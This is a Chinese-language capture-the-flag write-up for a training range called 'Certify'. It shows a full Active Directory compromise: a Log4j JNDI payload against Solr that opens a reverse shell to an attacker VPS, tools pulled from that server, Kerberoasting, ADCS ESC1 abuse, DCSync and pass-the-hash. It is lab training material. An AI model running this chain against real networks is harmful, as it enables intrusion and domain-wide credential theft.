【内网攻防】春秋云镜-certify-WriteUp

2023年12月23日10:30:18评论61 views字数 4499阅读14分59秒阅读模式

Certify是一套难度为中等的靶场环境，完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法，加强对域环境核心认证机制的理解，以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag，分布于不同的靶机。

获取入口机权限

通过fscan对目标ip进行扫描

【内网攻防】春秋云镜-certify-WriteUp

solr存在log4j组件，于是尝试反序列化利用。

随后在action处利用dnslog探测

在dnslog平台上收到响应

【内网攻防】春秋云镜-certify-WriteUp

攻击vps：

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i vpsipnc -lvnp 8088

burp:

GET /solr/admin/cores?_=1679974172729&action=${jndi:ldap://vpsip:1389/Basic/ReverseShell/vpsip/8088}&config=solrconfig.xml&dataDir=data&instanceDir=new_core&name=new_core1&schema=schema.xml&wt=json HTTP/1.1Host: 47.92.246.182:8983User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:109.0) Gecko/20100101 Firefox/111.0Accept: application/json, text/plain, */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestConnection: close

收到shell，并成功通过grc提权【内网攻防】春秋云镜-certify-WriteUp

内网横向

在入口机获取flag01：flag{d587f1e4-9d39-4866-ae0d-01d06edecede}

【内网攻防】春秋云镜-certify-WriteUp

上传fscan，对当前c段进行扫描

curl http://vpsip:8090/fscan_amd64 --output fscan_amd64./fscan_amd64 -h 172.22.9.1/24

./fscan_amd64 -h 172.22.9.1/24


___                              _  / _      ___  ___ _ __ __ _  ___| | __ / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <    ____/     |___/___|_|  __,_|___|_|_                        fscan version: 1.8.2start infoscan(icmp) Target 172.22.9.19     is alive(icmp) Target 172.22.9.13     is alive(icmp) Target 172.22.9.7      is alive(icmp) Target 172.22.9.26     is alive(icmp) Target 172.22.9.47     is alive[*] Icmp alive hosts len is: 5172.22.9.7:135 open172.22.9.13:135 open172.22.9.26:135 open172.22.9.26:80 open172.22.9.47:80 open172.22.9.47:22 open172.22.9.19:80 open172.22.9.47:21 open172.22.9.19:22 open172.22.9.26:445 open172.22.9.47:445 open172.22.9.7:445 open172.22.9.13:445 open172.22.9.47:139 open172.22.9.26:139 open172.22.9.7:139 open172.22.9.13:139 open172.22.9.7:88 open172.22.9.19:8983 open[*] alive ports len is: 19start vulscan[*] WebTitle: http://172.22.9.19        code:200 len:612    title:Welcome to nginx![*] NetInfo:[*]172.22.9.26   [->]DESKTOP-CBKTVMO   [->]172.22.9.26[*] NetInfo:[*]172.22.9.13   [->]CA01   [->]172.22.9.13[*] WebTitle: http://172.22.9.47        code:200 len:10918  title:Apache2 Ubuntu Default Page: It works[*] NetBios: 172.22.9.13     XIAORANGCA01[*] NetInfo:[*]172.22.9.7   [->]XIAORANG-DC   [->]172.22.9.7[*] 172.22.9.47  (Windows 6.1)[*] NetBios: 172.22.9.7      [+]DC XIAORANGXIAORANG-DC[*] NetBios: 172.22.9.47     fileserver                          Windows 6.1[*] NetBios: 172.22.9.26     XIAORANGDESKTOP-CBKTVMO[*] WebTitle: http://172.22.9.19:8983   code:302 len:0      title:None 跳转url: http://172.22.9.19:8983/solr/[*] WebTitle: http://172.22.9.26        code:200 len:703    title:IIS Windows Server[*] WebTitle: http://172.22.9.19:8983/solr/ code:200 len:16555  title:Solr Admin

上传frp，代理进入内网进行内网渗透

curl http://vpsip:8001/frpc --output frpccurl http://vpsip:8001/frpc.ini --output frpc.inichmod +x ./frpcnohup ./frpc -c frpc.ini

【内网攻防】春秋云镜-certify-WriteUp

前面通过fscan扫描发现172.22.9.47为fileserver，于是通过smbclient进行匿名连接，获取flag02：flag{ef35e055-511c-4733-80cf-3313b653a9c8}

python3 smbclient.py 172.22.9.47

【内网攻防】春秋云镜-certify-WriteUp

在fileserver上看到了personal.db文件，利用navicat对其进行解析，并把members的name字段表当作用户名，把users表的password当作密码来进行爆破。

【内网攻防】春秋云镜-certify-WriteUp

成功爆破出两个用户：

zhangjian-->i9XDE02pLVfliupeng–->fiAzGwEMgTY

【内网攻防】春秋云镜-certify-WriteUp

对dc的netbios进行查询，发现域名为xiaorang.lab

crackmapexec smb 172.22.9.7

【内网攻防】春秋云镜-certify-WriteUp

前面获取了两个域用户的账号密码，通过https://github.com/lzzbb/Adinfo获取整个域结构。

./Adinfo_darwin -d xiaorang.lab --dc 172.22.9.7 -u zhangjian -p i9XDE02pLVf

【内网攻防】春秋云镜-certify-WriteUp

上图发现有用户存在Asrep Roasting 漏洞，我们知道如果某个域内用户存在Asrep Roasting漏洞，那么我们可以在不知道他密码的情况下，获取他的logonsession key，然后通过hacshacat进行爆破。
先通过impacket中的GetUserSPNs.py获取其logonsession key

python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/liupeng:fiAzGwEMgTY

【内网攻防】春秋云镜-certify-WriteUp

然后通过hashcat将上一步的logonsession key进行暴力破解，获得zhangxia/MyPass2@@6

hashcat -m 13100 roasting.txt pass.txt --force --show

【内网攻防】春秋云镜-certify-WriteUp

前面同样通过Adinfo发现了域内存在ADCS，于是我们可以通过https://github.com/ly4k/Certipy对域内的ADCS进行漏洞探测。

发现域内存在ESC-1漏洞，对应模版为”XR Manager”

certipy find -u [email protected] -p MyPass2@@6 -dc-ip 172.22.9.7 -stdout -vulnerable

【内网攻防】春秋云镜-certify-WriteUp

尝试certipy利用，导出失败，显示KDC_ERR_PADATA_TYPE_NOSUP错误

certipy req -username [email protected] -password "MyPass2@@6" -ca xiaorang-CA01-CA -target CA01.xiaorang.lab -template "XR Manager" -upn [email protected]certipy auth -pfx administrator.pfx -dc-ip 172.22.9.7

【内网攻防】春秋云镜-certify-WriteUp

这是因为域控不支持 PKINIT，利用passthecert进行bypass，并设置zhangxia的dcsync属性

certipy cert -pfx administrator.pfx -nokey -out user.crtcertipy cert -pfx administrator.pfx -nocert -out user.keypython3 passthecert.py -action modify_user -crt user.crt -key user.key -domain xiaorang.lab -dc-ip 172.22.9.7 -target zhangxia -elevate

【内网攻防】春秋云镜-certify-WriteUp

现在zhangxia已经有了dcsync权限，从而获取域内域管administrator的hash

python3 secretsdump.py zhangxia:"MyPass2@@6"@172.22.9.7 -just-dc-user administrator

【内网攻防】春秋云镜-certify-WriteUp

通过administrator的hash进行wmiexec，获得flag04：flag{fabfa137-e0ef-4dca-aca3-f9d1e6fde081}

python3 wmiexec.py [email protected] -hashes :2f1b57eefb2d152196836b0516abea80 -codec gbk

【内网攻防】春秋云镜-certify-WriteUp

还有一台域内机器172.22.9.26没有利用，通过wmi进行连接

【内网攻防】春秋云镜-certify-WriteUp

得到flag03：flag{0deb6c8b-2f32-4351-925f-66cead070365}

原文始发于微信公众号（猫蛋儿安全）：【内网攻防】春秋云镜-certify-WriteUp

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【内网攻防】春秋云镜-certify-WriteUp

网络安全人士必知的MCP和A2A协议

第三方供应商遭勒索软件攻击，中国银行和星展银行11,200名客户受影响

低成本本地部署DeepSeek

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

发表评论

在线咨询

微信